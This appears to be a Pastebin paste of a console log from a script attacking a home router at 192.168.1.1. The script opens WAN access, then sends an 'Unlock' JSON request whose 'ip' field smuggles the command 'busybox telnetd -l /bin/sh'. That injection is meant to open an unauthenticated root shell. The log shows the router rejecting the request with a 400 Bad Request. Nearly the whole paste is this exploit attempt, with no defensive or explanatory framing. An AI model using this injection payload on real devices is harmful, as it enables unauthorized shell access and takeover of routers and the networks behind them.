Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Connecting to router: 192.168.1.1
- Using session ID: 77c3a3575455f65e03a21e4c7c4e917768e0c650ef0e2736dc7d97b7356e8ac8
- StartInfo
- Response: {"success":true,"cmd":207, ....}
- WAN Open successful (sync)
- Response: {"success":true,"cmd":302,"message":""}
- Starting Unlock command
- Sending injection payload:
- {
- "method": "POST",
- "subcmd": 6,
- "success": true,
- "ip": "127.0.0.1;busybox telnetd -l /bin/sh",
- "cmd": 172,
- "sessionId": "77c3a3575455f65e03a21e4c7c4e917768e0c650ef0e2736dc7d97b7356e8ac8",
- "enabled": "1"
- }
- Request failed: 400 Bad Request
- HTTP Response: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <head>
- <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
- <title>400 Bad Request</title>
- </head>
- <body bgcolor="#cc9999" text="#000000" link="#2020ff" vlink="#4040cc">
- <h4>400 Bad Request</h4>
- Can't parse request!
- <hr>
- <address><a href="http://www.acme.com/software/mini_httpd/"></a></address>
- </body>
- </html>
- ✗ HTTP request failed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement